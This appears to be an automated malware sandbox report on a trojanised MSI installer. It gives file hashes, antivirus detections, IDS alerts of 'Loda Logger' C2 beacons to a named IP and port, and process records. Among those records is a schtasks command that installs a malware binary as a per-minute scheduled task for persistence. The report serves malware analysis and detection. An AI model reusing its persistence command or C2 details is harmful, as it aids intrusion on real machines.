                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g.........."......P...0...P.......`........@.......................................@...@.......@.........................$........(..............................................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0...........H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                      C:\Windows\Installer\687630.msi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Category:dropped
                                      Size (bytes):974848
                                      Entropy (8bit):7.777108664035736
                                      Encrypted:false
                                      SSDEEP:24576:bEohloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:bEohloJfHAY+vqOdxI
                                      MD5:9E62C7A7CAADA70E0CD988510E2E0838
                                      SHA1:3B2884A46AE25E424805879BD8F2E1E970C54272
                                      SHA-256:E397394A06441C8893D91907B6E7DD02BB1E5243D26697FEB924B24BB2984647
                                      SHA-512:0B5F01A25AB6B45010973B9AAAAB6475A3FEC97146FDC27E81865920E9E372B7B74D5741CC75FA5B021A607744A0CD9D156C9A26B7CECE8757F87D79969CD0CC
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\MSI7739.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):948432
                                      Entropy (8bit):7.851470907851766
                                      Encrypted:false
                                      SSDEEP:24576:jhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6h:jhloJfHAY+vqOdxIO
                                      MD5:1C592EE9353CB59CC211B8189D5C6E13
                                      SHA1:F344C0D242C88684D730B45CE8AB5AEEE0503E15
                                      SHA-256:4CC64E9ADF84257FB9F7291985950BA4B11910725DB60B3ED35D71A3D844E9DA
                                      SHA-512:57385C00ECFDC70CE455A7940711E171408CCD66A0FAD99A2FD87D4D2EE640D72D6233E5D1C393206193C033EBDBBF84D3EE7678D5C7AA711163A72FB2652F4B
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..test.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......v..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g..........".....

                                      C:\Windows\Installer\MSI77F6.tmp

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:modified
                                      Size (bytes):947712
                                      Entropy (8bit):7.851989959006576
                                      Encrypted:false
                                      SSDEEP:24576:zhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:zhloJfHAY+vqOdxI
                                      MD5:13AF887E6C39E427715E769CC334C83E
                                      SHA1:C05DC910ACC1FE36F948AB7BCD24142E4AB913AE
                                      SHA-256:C40CF35821B67498B5E3B1FCD09DD59039C44AE3821EA4BFDCCC0A5E4EFDA3FB
                                      SHA-512:AF426B3D840C3CB6A70A379BDC6FF3E67D6AE06B7CDA0830966ED5DBCD9F3B7D40EF79062BC76622E66C36DFAF47813E3E96CE0DC1277F1A866050BFFB5E207C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      • Antivirus: Virustotal, Detection: 52%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g.........."......P...0...P.......`........@.......................................@...@.......@.........................$........(..............................................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0...........H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                      C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.7679251964572871
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjGalAGiLIlHVRpzh/7777777777777777777777777vDHF2FOwwkLQp0V:JsalQI53Ebwkz8F
                                      MD5:3915CAAC75D1C92C893793532083C478
                                      SHA1:13D05C59CB9E2B17038AF43ECB0546AAFF86D691
                                      SHA-256:1983DF1424C3E9613FE9F9EF9E6A83AAE3884BFDF44A9488661020B52C95CC29
                                      SHA-512:E95D7D9FCB6046A0828E46BF6F5A32E02D7EC2920D38EB950CEFDAC43F3D69B03F8912B2268FE5C89C9B6A88623578F87E1FD273150B593B16C95281C44F4603
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1488607792011796
                                      Encrypted:false
                                      SSDEEP:24:JRaJYh+3AmAuxhiAipKP2xza2tzhAzZdagUMClXtdd+iUJ+BmipVJ+ZVgwG2irk6:CJnLAu7NveFXJ9T5yJ0mSzUgMSzfT
                                      MD5:936553B56926FE63182ED721DD7A1EF1
                                      SHA1:1CDA9580ECF01D2E10C104EB73FBEB9E81341586
                                      SHA-256:9FC86AADBD59D0DB03619D436337539B10B8DD99F555749FDBFF1779A0EA3C7E
                                      SHA-512:4B2A295C765552C6EC7C74A67C248F4C9B97EA95575771E1597A1BD6A5666EBC666D2739519FB773ECB1CEC1F3D5AA73B3FC2F858EB40DC542150EEB610A8C05
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):360001
                                      Entropy (8bit):5.3629871472855895
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauE:zTtbmkExhMJCIpEd
                                      MD5:17987419D83065C17C0957B937B5F7AD
                                      SHA1:140CCE01E73B72A47F982394A2913AA007D2AEFC
                                      SHA-256:3C11D0630C80E9F807FC16CA60F0C31190EB5343F4A248C919BB38707A8E35DE
                                      SHA-512:494657285DAFBA71E0455809BA2F2721E1DE13E39C6F8980196096C91B5C0D297C411968E186EBFFC16322156D0010305AAA7A0D31F932CAD41CDCB19F951AE8
                                      Malicious:false
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                      C:\Windows\Temp\~DF0A7CEB7C73BF9D6B.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1488607792011796
                                      Encrypted:false
                                      SSDEEP:24:JRaJYh+3AmAuxhiAipKP2xza2tzhAzZdagUMClXtdd+iUJ+BmipVJ+ZVgwG2irk6:CJnLAu7NveFXJ9T5yJ0mSzUgMSzfT
                                      MD5:936553B56926FE63182ED721DD7A1EF1
                                      SHA1:1CDA9580ECF01D2E10C104EB73FBEB9E81341586
                                      SHA-256:9FC86AADBD59D0DB03619D436337539B10B8DD99F555749FDBFF1779A0EA3C7E
                                      SHA-512:4B2A295C765552C6EC7C74A67C248F4C9B97EA95575771E1597A1BD6A5666EBC666D2739519FB773ECB1CEC1F3D5AA73B3FC2F858EB40DC542150EEB610A8C05
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DF80922B01F2801C61.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):81920
                                      Entropy (8bit):0.07517293309285995
                                      Encrypted:false
                                      SSDEEP:12:5wW2syASClxvvb+ipVJ+8lqipVJ+soVjNJIiWlIC1n2s2tpqsA5GndD2+kDWG2Il:ZPTvb+ipVJ+dipVJ+ZVgwG2irkp2+0
                                      MD5:E0525D10F431063E6BE9C563A71D96CB
                                      SHA1:A01A5D60A1E461D107D9702BEEE9CC6DA34742EA
                                      SHA-256:D1529E2A29E1280188A85E4E0EE7FC9A9D1C608B0DF8C5507206FD1AAF25AE5D
                                      SHA-512:2C510ABA4A16892AC4456F00C0CE372F662F159863F0D8BFB47EAA10571DFFF2E448EA72F08E031D981E19034AC78AE1CFF3EC23545FF3C05E934FBE6593FD7C
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DF8C40633E58356F3C.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\~DFAF34BA1DCB565277.TMP

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.06839263853294958
                                      Encrypted:false
                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO2F/WwwPcsXqtoVky6l0t/:2F0i8n0itFzDHF2FOwwkzx01
                                      MD5:A60577955CB5E43728925418C4CE2D8E
                                      SHA1:28502732D11233636E3AAAF5F8BF3FD6C4D380C7
                                      SHA-256:2F973CF018C645A95814CA0D9643EA5754685535731E714AB05BD337C8666DA9
                                      SHA-512:8F2001BEAFC2C82DC7C2D43EAC647DF657A6E2DDF30BAF728FFA4DADAA1B44990560DFB34854CD28AF6DAAB4A2F2B7330BE9A19E9015BF9344F0BAFB9B1980FC
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Entropy (8bit):7.777108664035736
                                      TrID:
                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                      File name:test.msi
                                      File size:974'848 bytes
                                      MD5:9e62c7a7caada70e0cd988510e2e0838
                                      SHA1:3b2884a46ae25e424805879bd8f2e1e970c54272
                                      SHA256:e397394a06441c8893d91907b6e7dd02bb1e5243d26697feb924b24bb2984647
                                      SHA512:0b5f01a25ab6b45010973b9aaaab6475a3fec97146fdc27e81865920e9e372b7b74d5741cc75fa5b021a607744a0cd9d156c9a26b7cece8757f87d79969cd0cc
                                      SSDEEP:24576:bEohloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:bEohloJfHAY+vqOdxI
                                      TLSH:FE25E0E1A740C465E8679679943B9BA77833AE1E8C680A4C3891FF0F7D723474063D9B
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:2d2e3797b32b2b99

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649762172.111.138.1005552TCP
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649885172.111.138.1005552TCP
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649986172.111.138.1005552TCP
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649949172.111.138.1005552TCP
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649988172.111.138.1005552TCP
                                      2024-12-30T11:36:12.325655+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649826172.111.138.1005552TCP
                                      2024-12-30T11:36:28.508339+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649762172.111.138.1005552TCP
                                      2024-12-30T11:36:37.554770+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649826172.111.138.1005552TCP
                                      2024-12-30T11:36:46.800558+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649885172.111.138.1005552TCP
                                      2024-12-30T11:36:55.862538+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649949172.111.138.1005552TCP
                                      2024-12-30T11:37:04.956730+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649986172.111.138.1005552TCP
                                      2024-12-30T11:37:14.034642+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.649988172.111.138.1005552TCP
                                      2024-12-30T11:37:25.586902+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.649988TCP
                                      2024-12-30T11:38:03.633679+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.649988TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 30, 2024 11:36:28.502741098 CET497625552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:28.507884979 CET555249762172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:28.507987022 CET497625552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:28.508338928 CET497625552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:28.513200045 CET555249762172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:30.657407999 CET555249762172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:30.657636881 CET497625552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:30.707663059 CET497625552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:30.712481976 CET555249762172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:37.549397945 CET498265552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:37.554204941 CET555249826172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:37.554342985 CET498265552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:37.554769993 CET498265552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:37.559595108 CET555249826172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:39.681504965 CET555249826172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:39.681587934 CET498265552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:39.738115072 CET498265552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:39.742892981 CET555249826172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:46.795015097 CET498855552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:46.799900055 CET555249885172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:46.800237894 CET498855552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:46.800558090 CET498855552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:46.805293083 CET555249885172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:49.010513067 CET555249885172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:49.010651112 CET498855552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:49.036078930 CET498855552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:49.040915966 CET555249885172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:55.857383013 CET499495552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:55.862160921 CET555249949172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:55.862230062 CET499495552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:55.862538099 CET499495552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:55.867327929 CET555249949172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:58.022483110 CET555249949172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:36:58.022538900 CET499495552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:58.058701992 CET499495552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:36:58.063591957 CET555249949172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:04.951342106 CET499865552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:04.956264019 CET555249986172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:04.956384897 CET499865552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:04.956729889 CET499865552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:04.961554050 CET555249986172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:07.078279972 CET555249986172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:07.078365088 CET499865552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:07.128298998 CET499865552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:07.133142948 CET555249986172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:14.029357910 CET499885552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:14.034205914 CET555249988172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:14.034317970 CET499885552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:14.034641981 CET499885552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:37:14.039387941 CET555249988172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:25.586901903 CET555249988172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:37:25.638124943 CET499885552192.168.2.6172.111.138.100
                                      Dec 30, 2024 11:38:03.633678913 CET555249988172.111.138.100192.168.2.6
                                      Dec 30, 2024 11:38:03.684983969 CET499885552192.168.2.6172.111.138.100

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:05:36:15
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi"
                                      Imagebase:0x7ff695ed0000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:2
                                      Start time:05:36:15
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff695ed0000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:05:36:16
                                      Start date:30/12/2024
                                      Path:C:\Windows\Installer\MSI77F6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Installer\MSI77F6.tmp"
                                      Imagebase:0x770000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      • Detection: 52%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:7
                                      Start time:05:36:18
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                                      Imagebase:0xa40000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:05:36:20
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      • Detection: 52%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:05:36:27
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:05:36:36
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:05:36:44
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:05:37:01
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:05:38:00
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                                      Imagebase:0x280000
                                      File size:947'712 bytes
                                      MD5 hash:13AF887E6C39E427715E769CC334C83E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

